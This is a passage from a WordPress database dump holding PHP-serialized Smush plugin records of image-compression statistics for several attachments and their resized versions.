size_before\";i:44800;s:10:\"size_after\";i:37937;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:38568;s:10:\"size_after\";i:38568;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:5725;s:11:\"size_before\";i:18638;s:10:\"size_after\";i:12913;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:8526;s:11:\"size_before\";i:28679;s:10:\"size_after\";i:20153;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:6546;s:11:\"size_before\";i:32897;s:10:\"size_after\";i:26351;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}}}'),(4343,1839,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:29.468586364550279910190511145628988742828369140625;s:5:\"bytes\";i:67420;s:11:\"size_before\";i:228786;s:10:\"size_after\";i:161366;s:4:\"time\";d:1.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3403;s:11:\"size_before\";i:10640;s:10:\"size_after\";i:7237;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.63000000000000255795384873636066913604736328125;s:5:\"bytes\";i:8482;s:11:\"size_before\";i:24490;s:10:\"size_after\";i:16008;s:4:\"time\";d:0.25;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:14288;s:11:\"size_before\";i:52821;s:10:\"size_after\";i:38533;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:10195;s:11:\"size_before\";i:47822;s:10:\"size_after\";i:37627;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.030000000000001136868377216160297393798828125;s:5:\"bytes\";i:7116;s:11:\"size_before\";i:20909;s:10:\"size_after\";i:13793;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.7000000000000028421709430404007434844970703125;s:5:\"bytes\";i:11956;s:11:\"size_before\";i:32582;s:10:\"size_after\";i:20626;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.309999999999998721023075631819665431976318359375;s:5:\"bytes\";i:11980;s:11:\"size_before\";i:39522;s:10:\"size_after\";i:27542;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4344,1838,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.47870568641446453739263233728706836700439453125;s:5:\"bytes\";i:64051;s:11:\"size_before\";i:210150;s:10:\"size_after\";i:146099;s:4:\"time\";d:1.3600000000000000976996261670137755572795867919921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.18999999999999772626324556767940521240234375;s:5:\"bytes\";i:3298;s:11:\"size_before\";i:10244;s:10:\"size_after\";i:6946;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.340000000000003410605131648480892181396484375;s:5:\"bytes\";i:9281;s:11:\"size_before\";i:24855;s:10:\"size_after\";i:15574;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:12796;s:11:\"size_before\";i:49099;s:10:\"size_after\";i:36303;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:7280;s:11:\"size_before\";i:36986;s:10:\"size_after\";i:29706;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.49000000000000198951966012828052043914794921875;s:5:\"bytes\";i:7881;s:11:\"size_before\";i:21597;s:10:\"size_after\";i:13716;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:12224;s:11:\"size_before\";i:31435;s:10:\"size_after\";i:19211;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:11291;s:11:\"size_before\";i:35934;s:10:\"size_after\";i:24643;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4345,1837,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:31.0876490769482103360132896341383457183837890625;s:5:\"bytes\";i:45669;s:11:\"size_before\";i:146904;s:10:\"size_after\";i:101235;s:4:\"time\";d:1.430000000000000159872115546022541821002960205078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:2566;s:11:\"size_before\";i:8776;s:10:\"size_after\";i:6210;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.00999999999999801048033987171947956085205078125;s:5:\"bytes\";i:7422;s:11:\"size_before\";i:21199;s:10:\"size_after\";i:13777;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:8757;s:11:\"size_before\";i:33483;s:10:\"size_after\";i:24726;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1548;s:11:\"size_before\";i:18030;s:10:\"size_after\";i:16482;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.38000000000000255795384873636066913604736328125;s:5:\"bytes\";i:5980;s:11:\"size_before\";i:17914;s:10:\"size_after\";i:11934;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:44.3299999999999982946974341757595539093017578125;s:5:\"bytes\";i:10628;s:11:\"size_before\";i:23976;s:10:\"size_after\";i:13348;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.27000000000000312638803734444081783294677734375;s:5:\"bytes\";i:8768;s:11:\"size_before\";i:23526;s:10:\"size_after\";i:14758;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4346,1836,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.1337259988517729425439029000699520111083984375;s:5:\"bytes\";i:64211;s:11:\"size_before\";i:188116;s:10:\"size_after\";i:123905;s:4:\"time\";d:1.79999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3117;s:11:\"size_before\";i:9387;s:10:\"size_after\";i:6270;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:8896;s:11:\"size_before\";i:22849;s:10:\"size_after\";i:13953;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:13950;s:11:\"size_before\";i:43681;s:10:\"size_after\";i:29731;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:7788;s:11:\"size_before\";i:32725;s:10:\"size_after\";i:24937;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:7124;s:11:\"size_before\";i:19051;s:10:\"size_after\";i:11927;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:11974;s:11:\"size_before\";i:28313;s:10:\"size_after\";i:16339;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.38000000000000255795384873636066913604736328125;s:5:\"bytes\";i:11362;s:11:\"size_before\";i:32110;s:10:\"size_after\";i:20748;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4347,1835,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.6009322826066778588938177563250064849853515625;s:5:\"bytes\";i:55894;s:11:\"size_before\";i:161539;s:10:\"size_after\";i:105645;s:4:\"time\";d:1.560000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:29;s:5:\"bytes\";i:2384;s:11:\"size_before\";i:8222;s:10:\"size_after\";i:5838;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.63000000000000255795384873636066913604736328125;s:5:\"bytes\";i:7968;s:11:\"size_before\";i:21750;s:10:\"size_after\";i:13782;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.35000000000000142108547152020037174224853515625;s:5:\"bytes\";i:12235;s:11:\"size_before\";i:37821;s:10:\"size_after\";i:25586;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:5287;s:11:\"size_before\";i:22728;s:10:\"size_after\";i:17441;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.97999999999999687361196265555918216705322265625;s:5:\"bytes\";i:6362;s:11:\"size_before\";i:18186;s:10:\"size_after\";i:11824;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.74000000000000198951966012828052043914794921875;s:5:\"bytes\";i:10872;s:11:\"size_before\";i:25438;s:10:\"size_after\";i:14566;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.36999999999999744204615126363933086395263671875;s:5:\"bytes\";i:10786;s:11:\"size_before\";i:27394;s:10:\"size_after\";i:16608;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(4348,1834,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.8815541643496516144296037964522838592529296875;s:5:\"bytes\";i:53253;s:11:\"size_before\";i:222988;s:10:\"size_after\";i:169735;s:4:\"time\";d:1.6799999999999999378275106209912337362766265869140625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3466;s:11:\"size_before\";i:11678;s:10:\"size_after\";i:8212;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8978;s:11:\"size_before\";i:25760;s:10:\"size_after\";i:16782;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:9551;s:11:\"size_before\";i:49587;s:10:\"size_after\";i:40036;s:4:\"time\";d:0.429999999999999993338661852249060757458209991455078125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.54000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2830;s:11:\"size_before\";i:43277;s:10:\"size_after\";i:40447;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:7494;s:11:\"size_before\";i:22187;s:10:\"size_after\";i:14693;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.31000000000000227373675443232059478759765625;s:5:\"bytes\";i:12618;s:11:\"size_before\";i:33817;s:10:\"size_after\";i:21199;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:8316;s:11:\"size_before\";i:36682;s:10:\"size_after\";i:28366;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4349,1833,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:35.9829716785904309972465853206813335418701171875;s:5:\"bytes\";i:60858;s:11:\"size_before\";i:169130;s:10:\"size_after\";i:108272;s:4:\"time\";d:1.560000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.68999999999999772626324556767940521240234375;s:5:\"bytes\";i:2490;s:11:\"size_before\";i:7617;s:10:\"size_after\";i:5127;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:7419;s:11:\"size_before\";i:19338;s:10:\"size_after\";i:11919;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.86999999999999744204615126363933086395263671875;s:5:\"bytes\";i:14715;s:11:\"size_before\";i:41021;s:10:\"size_after\";i:26306;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:10648;s:11:\"size_before\";i:33902;s:10:\"size_after\";i:23254;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.2999999999999971578290569595992565155029296875;s:5:\"bytes\";i:5968;s:11:\"size_before\";i:15998;s:10:\"size_after\";i:10030;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:9961;s:11:\"size_before\";i:23460;s:10:\"size_after\";i:13499;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.74000000000000198951966012828052043914794921875;s:5:\"bytes\";i:9657;s:11:\"size_before\";i:27794;s:10:\"size_after\";i:18137;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4350,1832,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.4512484986636735584397683851420879364013671875;s:5:\"bytes\";i:84427;s:11:\"size_before\";i:277253;s:10:\"size_after\";i:192826;s:4:\"time\";d:1.810000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:3606;s:11:\"size_before\";i:11953;s:10:\"size_after\";i:8347;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:9043;s:11:\"size_before\";i:27648;s:10:\"size_after\";i:18605;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:19568;s:11:\"size_before\";i:67036;s:10:\"size_after\";i:47468;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:15119;s:11:\"size_before\";i:56485;s:10:\"size_after\";i:41366;s:4:\"time\";d:0.61999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7702;s:11:\"size_before\";i:24377;s:10:\"size_after\";i:16675;s:4:\"time\";d:0.25;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.49000000000000198951966012828052043914794921875;s:5:\"bytes\";i:14429;s:11:\"size_before\";i:40660;s:10:\"size_after\";i:26231;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.469999999999998863131622783839702606201171875;s:5:\"bytes\";i:14960;s:11:\"size_before\";i:49094;s:10:\"size_after\";i:34134;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(4352,2029,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:1578775;s:10:\"size_after\";i:1578775;s:4:\"time\";d:0.94000000000000005773159728050814010202884674072265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:40939;s:10:\"size_after\";i:40939;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:58257;s:10:\"size_after\";i:58257;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:311121;s:10:\"size_after\";i:311121;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:542597;s:10:\"size_after\";i:542597;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:74195;s:10:\"size_after\";i:74195;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:208719;s:10:\"size_after\";i:208719;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:342947;s:10:\"size_after\";i:342947;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4353,1831,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.395649274662889016695999089279212057590484619140625;s:5:\"bytes\";i:9233;s:11:\"size_before\";i:385407;s:10:\"size_after\";i:376174;s:4:\"time\";d:1.3400000000000000799360577730112709105014801025390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:881;s:11:\"size_before\";i:14290;s:10:\"size_after\";i:13409;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:4069;s:11:\"size_before\";i:29499;s:10:\"size_after\";i:25430;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:88924;s:10:\"size_after\";i:88924;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:114806;s:10:\"size_after\";i:114806;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:2318;s:11:\"size_before\";i:25935;s:10:\"size_after\";i:23617;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.12999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1965;s:11:\"size_before\";i:47570;s:10:\"size_after\";i:45605;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64383;s:10:\"size_after\";i:64383;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4354,1830,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:29.769083563682759319135584519244730472564697265625;s:5:\"bytes\";i:35001;s:11:\"size_before\";i:117575;s:10:\"size_after\";i:82574;s:4:\"time\";d:1.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2609;s:11:\"size_before\";i:8044;s:10:\"size_after\";i:5435;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.93999999999999772626324556767940521240234375;s:5:\"bytes\";i:6777;s:11:\"size_before\";i:18855;s:10:\"size_after\";i:12078;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:6231;s:11:\"size_before\";i:26027;s:10:\"size_after\";i:19796;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.930000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:356;s:11:\"size_before\";i:12156;s:10:\"size_after\";i:11800;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.52000000000000312638803734444081783294677734375;s:5:\"bytes\";i:5515;s:11:\"size_before\";i:15528;s:10:\"size_after\";i:10013;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:7988;s:11:\"size_before\";i:18331;s:10:\"size_after\";i:10343;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:5525;s:11:\"size_before\";i:18634;s:10:\"size_after\";i:13109;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4355,1829,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.495214140390938695190925500355660915374755859375;s:5:\"bytes\";i:40760;s:11:\"size_before\";i:232978;s:10:\"size_after\";i:192218;s:4:\"time\";d:1.3299999999999998490096686509787105023860931396484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2159;s:11:\"size_before\";i:9366;s:10:\"size_after\";i:7207;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:6627;s:11:\"size_before\";i:22796;s:10:\"size_after\";i:16169;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:9009;s:11:\"size_before\";i:54354;s:10:\"size_after\";i:45345;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:2011;s:11:\"size_before\";i:57347;s:10:\"size_after\";i:55336;s:4:\"time\";d:0.38000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:5032;s:11:\"size_before\";i:19184;s:10:\"size_after\";i:14152;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.280000000000001136868377216160297393798828125;s:5:\"bytes\";i:8328;s:11:\"size_before\";i:30523;s:10:\"size_after\";i:22195;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:7594;s:11:\"size_before\";i:39408;s:10:\"size_after\";i:31814;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4356,1828,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:32.65466219314972562415277934633195400238037109375;s:5:\"bytes\";i:81171;s:11:\"size_before\";i:248574;s:10:\"size_after\";i:167403;s:4:\"time\";d:1.529999999999999804600747665972448885440826416015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;